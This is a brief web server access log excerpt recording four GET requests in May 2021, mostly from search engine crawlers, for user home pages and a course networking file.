114.119.140.153 - - [09/May/2021:20:43:46 -0500] "GET /RockyHyberger/ HTTP/1.1" 200 5995 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
207.46.13.102 - - [09/May/2021:20:47:30 -0500] "GET /AllenBenusa/ HTTP/1.1" 301 185 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.155 - - [09/May/2021:20:52:53 -0500] "GET /JimMartinson/CST1025/Resources/ComputerNetworks/auxiliary_files/ns3/wireless.cc HTTP/1.1" 200 8205 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
140.186.231.96 - - [09/May/2021:20:53:00 -0500] "GET / HTTP/1.1" 200 12397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
